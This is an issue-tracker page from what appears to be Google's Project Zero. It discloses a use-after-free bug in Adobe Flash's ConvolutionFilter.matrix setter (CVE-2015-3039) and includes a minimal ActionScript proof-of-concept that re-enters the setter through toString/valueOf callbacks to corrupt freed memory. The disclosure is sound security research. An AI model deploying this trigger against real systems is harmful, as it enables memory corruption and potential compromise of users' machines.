Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 244
Starred by 2 users
Status: Fixed
Owner:
cevans@google.com
Email to this user bounced
Closed: Apr 2015
Cc:
project-...@google.com



Sign in to add a comment
 Adobe Flash: Setting ConvolutionFilter.matrix can write to memory that has already been freed
Project Member Reported by natashenka@google.com, Jan 30 2015 Back to list 
Setting ConvolutionFilter.matrix from inside the ConvolutionFilter.matrix setter can cause memory corruption due to writing to a pointer that has already been freed.

A minimal PoC is below, and code and a swf is attached.

var filter:flash.filters.ConvolutionFilter = new flash.filters.ConvolutionFilter(3, 3, [1, 1, 1, 1, 1, 1, 1, 1, 1], 9, 0, true, false, 0x0000FF, alpha);
	var n = {};
	n.toString = ts;
	n.valueOf = ts;
	var a = [];
	for(var k = 0; k < 1; k++){
		a[k] = n;	
		}
	var iff = 0;
	filter.matrix = a;
	function ts(){
			if (iff < 10){
			iff++;
			filter.matrix = a;
			}
			
			var q = "";
			for(var j = 0; j < 10000; j++){
				var qq = "9";
				}
		
			return 0x77777777;
			}


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
cvfilter.fla
5.7 KB Download
cvfilter3.swf
958 bytes Download
Comment 1 by cevans@google.com, Feb 2 2015
Labels: Id-3264
Comment 2 by cevans@google.com, Apr 10 2015
Labels: CVE-2015-3039
Project Member Comment 4 by natashenka@google.com, Apr 24 2015
Labels: -Restrict-View-Commit
Sign in to add a comment